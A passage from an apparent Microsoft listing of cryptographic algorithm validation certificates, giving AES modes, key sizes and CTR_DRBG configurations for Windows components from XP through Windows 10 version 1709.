    Key Size: 256: Modes: Decrypt, Encrypt; Block Sizes: Full

Algorithm Implementation and Certificate #: Microsoft Surface Hub Cryptography Next Generation (CNG) Implementations #4900
Version: 10.0.15063.674
Modes / States / Key Sizes:
  AES-KW: Modes: Decrypt, Encrypt; CIPHK transformation direction: Forward; Key Lengths: 128, 192, 256 (bits); Plain Text Lengths: 128, 192, 256, 320, 2048 (bits)
  AES Val#4902

Algorithm Implementation and Certificate #: Windows 10 Mobile (version 1709) Cryptography Next Generation (CNG) Implementations #4899
Version: 10.0.15254
Modes / States / Key Sizes:
  AES-KW: Modes: Decrypt, Encrypt; CIPHK transformation direction: Forward; Key Lengths: 128, 192, 256 (bits); Plain Text Lengths: 128, 192, 256, 320, 2048 (bits)
  AES Val#4901

Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Cryptography Next Generation (CNG) Implementations #4898
Version: 10.0.16299
Modes / States / Key Sizes:
  AES-KW: Modes: Decrypt, Encrypt; CIPHK transformation direction: Forward; Key Lengths: 128, 192, 256 (bits); Plain Text Lengths: 128, 192, 256, 320, 2048 (bits)
  AES Val#4897

Algorithm Implementation and Certificate #: Microsoft Surface Hub BitLocker(R) Cryptographic Implementations #4896
Version: 10.0.15063.674
Modes / States / Key Sizes:
  AES-CCM: Key Lengths: 256 (bits); Tag Lengths: 128 (bits); IV Lengths: 96 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES Val#4902

Algorithm Implementation and Certificate #: Windows 10 Mobile (version 1709) BitLocker(R) Cryptographic Implementations #4895
Version: 10.0.15254
Modes / States / Key Sizes:
  AES-CCM: Key Lengths: 256 (bits); Tag Lengths: 128 (bits); IV Lengths: 96 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES Val#4901

Algorithm Implementation and Certificate #: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); BitLocker(R) Cryptographic Implementations #4894
Version: 10.0.16299
Modes / States / Key Sizes:
  AES-CCM: Key Lengths: 256 (bits); Tag Lengths: 128 (bits); IV Lengths: 96 (bits); Plain Text Length: 0-32; AAD Length: 0-65536
  AES Val#4897

Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #4627
Version: 10.0.15063
Modes / States / Key Sizes:
  CBC ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); OFB ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )

Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile Cryptography Next Generation (CNG) Implementations #4626
Version: 10.0.15063
Modes / States / Key Sizes:
  KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , 256 , 192 , 320 , 2048 )
  AES Val#4624

Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile BitLocker(R) Cryptographic Implementations #4625
Version: 10.0.15063
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#4624

Algorithm Implementation and Certificate #: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #4624
Version: 10.0.15063
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 ) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 )
  GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( External ) ; PT Lengths Tested: ( 0 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ; 96BitIV_Supported GMAC_Supported
  XTS( (KS: XTS_128( (e/d) (f) ) KS: XTS_256( (e/d) (f) )

Algorithm Implementation and Certificate #: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #4434
Version: 7.00.2872
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #4433
Version: 8.00.6246
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #4431
Version: 7.00.2872
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )

Algorithm Implementation and Certificate #: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #4430
Version: 8.00.6246
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )
Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #4074
Version: 10.0.14393
Modes / States / Key Sizes:
  CBC ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); OFB ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )

Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update SymCrypt Cryptographic Implementations #4064
Version: 10.0.14393
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 )
  GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ; IV Lengths Tested: ( 0 , 0 ) ; 96BitIV_Supported GMAC_Supported
  XTS( (KS: XTS_128( (e/d) (f) ) KS: XTS_256( (e/d) (f) )

Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update RSA32 Algorithm Implementations #4063
Version: 10.0.14393
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update Cryptography Next Generation (CNG) Implementations #4062
Version: 10.0.14393
Modes / States / Key Sizes:
  KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , 192 , 256 , 320 , 2048 )
  AES Val#4064

Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update BitLocker® Cryptographic Implementations #4061
Version: 10.0.14393
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#4064
Algorithm Implementation and Certificate #: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” Cryptography Next Generation (CNG) Implementations #3652
Version: 10.0.10586
Modes / States / Key Sizes:
  KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , 256 , 192 , 320 , 2048 )
  AES Val#3629

Algorithm Implementation and Certificate #: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” BitLocker® Cryptographic Implementations #3653
Version: 10.0.10586
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#3629

Algorithm Implementation and Certificate #: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” RSA32 Algorithm Implementations #3630
Version: 10.0.10586
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” SymCrypt Cryptographic Implementations #3629
Version: 10.0.10586
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 )
  GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ; IV Lengths Tested: ( 0 , 0 ) ; 96BitIV_Supported GMAC_Supported
  XTS( (KS: XTS_128( (e/d) (f) ) KS: XTS_256( (e/d) (f) )
Algorithm Implementation and Certificate #: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update Cryptography Next Generation (CNG) Implementations #3507
Version: 10.0.10240
Modes / States / Key Sizes:
  KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , 256 , 192 , 320 , 2048 )
  AES Val#3497

Algorithm Implementation and Certificate #: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 BitLocker® Cryptographic Implementations #3498
Version: 10.0.10240
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#3497

Algorithm Implementation and Certificate #: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 SymCrypt Cryptographic Implementations #3497
Version: 10.0.10240
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 )
  GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ; IV Lengths Tested: ( 0 , 0 ) ; 96BitIV_Supported GMAC_Supported
  XTS( (KS: XTS_128( (e/d) (f) ) KS: XTS_256( (e/d) (f) )

Algorithm Implementation and Certificate #: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 RSA32 Algorithm Implementations #3476
Version: 10.0.10240
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry RSA32 Algorithm Implementations #2853
Version: 6.3.9600
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 BitLocker® Cryptographic Implementations #2848
Version: 6.3.9600
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#2832

Algorithm Implementation and Certificate #: Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 SymCrypt Cryptographic Implementations #2832
Version: 6.3.9600
Modes / States / Key Sizes:
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 0 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 )
  GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 128 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 128 , 1024 , 8 , 1016 ) ; IV Lengths Tested: ( 8 , 1024 ) ; 96BitIV_Supported ; OtherIVLen_Supported GMAC_Supported

Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #2216
Modes / States / Key Sizes:
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  AES Val#2197
  CMAC (Generation/Verification ) (KS: 128; Block Size(s): ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 ) (KS: 192; Block Size(s): ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 ) (KS: 256; Block Size(s): ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 )
  AES Val#2197
  GCM(KS: AES_128( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104 96 ) (KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 ) IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 128 , 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 128 , 1024 , 8 , 1016 ) ; IV Lengths Tested: ( 8 , 1024 ) ; 96BitIV_Supported GMAC_Supported

Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 BitLocker® Cryptographic Implementations #2198
Modes / States / Key Sizes:
  CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Length(s): 16 )
  AES Val#2196

Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Next Generation Symmetric Cryptographic Algorithms Implementations (SYMCRYPT) #2197
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )

Algorithm Implementation and Certificate #: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Symmetric Algorithm Implementations (RSA32) #2196
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #:
  Windows Server 2008 R2 and SP1 CNG algorithms #1187
  Windows 7 Ultimate and SP1 CNG algorithms #1178
Modes / States / Key Sizes:
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
  AES Val#1168

Algorithm Implementation and Certificate #: Windows 7 Ultimate and SP1 and Windows Server 2008 R2 and SP1 BitLocker Algorithm Implementations #1177
Modes / States / Key Sizes:
  CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) (Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8 12 13 (Tag Length(s): 4 6 8 14 16 )
  AES Val#1168

Algorithm Implementation and Certificate #: Windows 7 and SP1 and Windows Server 2008 R2 and SP1 Symmetric Algorithm Implementation #1168
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Windows 7 and SP1 and Windows Server 2008 R2 and SP1 Symmetric Algorithm Implementation #1168, vendor-affirmed
Modes / States / Key Sizes:
  GCM
  GMAC

Algorithm Implementation and Certificate #: Windows Vista Ultimate SP1 and Windows Server 2008 BitLocker Algorithm Implementations #760
Modes / States / Key Sizes:
  CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) (Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8 12 13 (Tag Length(s): 4 6 8 14 16 )

Algorithm Implementation and Certificate #:
  Windows Server 2008 CNG algorithms #757
  Windows Vista Ultimate SP1 CNG algorithms #756
Modes / States / Key Sizes:
  CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) (Payload Length Range: 1 - 32 ( Nonce Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )

Algorithm Implementation and Certificate #: Windows Vista Ultimate BitLocker Drive Encryption #715
Modes / States / Key Sizes:
  CBC ( e/d; 128 , 256 );

Algorithm Implementation and Certificate #: Windows Vista Ultimate BitLocker Drive Encryption #424
Modes / States / Key Sizes:
  CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) (Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8 12 13 (Tag Length(s): 4 6 8 14 16 )

Algorithm Implementation and Certificate #:
  Windows Vista Ultimate SP1 and Windows Server 2008 Symmetric Algorithm Implementation #739
  Windows Vista Symmetric Algorithm Implementation #553
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CFB8 ( e/d; 128 , 192 , 256 );

Algorithm Implementation and Certificate #: Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #2023
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); CTR ( int only; 128 , 192 , 256 )

Algorithm Implementation and Certificate #:
  Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #2024
  Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #818
  Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #781
  Windows 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #548
  Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile Enhanced Cryptographic Provider (RSAENH) #516
  Windows CE and Windows Mobile 6, 6.1, and 6.5 Enhanced Cryptographic Provider (RSAENH) #507
  Windows Server 2003 SP1 Enhanced Cryptographic Provider (RSAENH) #290
  Windows CE 5.0 and 5.1 Enhanced Cryptographic Provider (RSAENH) #224
  Windows Server 2003 Enhanced Cryptographic Provider (RSAENH) #80
  Windows XP, SP1, and SP2 Enhanced Cryptographic Provider (RSAENH) #33
Modes / States / Key Sizes:
  ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 );

Deterministic Random Bit Generator (DRBG)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

Counter:
  Modes: AES-256
  Derivation Function States: Derivation Function not used
  Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4904
Implementation: Microsoft Surface Hub Virtual TPM Implementations #1734
Version: 10.0.15063.674

Counter:
  Modes: AES-256
  Derivation Function States: Derivation Function not used
  Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4903
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #1733
Version: 10.0.16299

Counter:
  Modes: AES-256
  Derivation Function States: Derivation Function used
  Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4902
Implementation: Microsoft Surface Hub SymCrypt Cryptographic Implementations #1732
Version: 10.0.15063.674

Counter:
  Modes: AES-256
  Derivation Function States: Derivation Function used
  Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4901
Implementation: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1731
Version: 10.0.15254

Counter:
  Modes: AES-256
  Derivation Function States: Derivation Function used
  Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4897
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1730
Version: 10.0.16299

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4627 ) ]
Implementation: Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #1556
Version: 10.0.15063

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#4624 ) ]
Implementation: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #1555
Version: 10.0.15063

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4434 ) ]
Implementation: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #1433
Version: 7.00.2872

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4433 ) ]
Implementation: Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #1432
Version: 8.00.6246

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4431 ) ]
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1430
Version: 7.00.2872

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4430 ) ]
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1429
Version: 8.00.6246

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#4074 ) ]
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #1222
Version: 10.0.14393

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#4064 ) ]
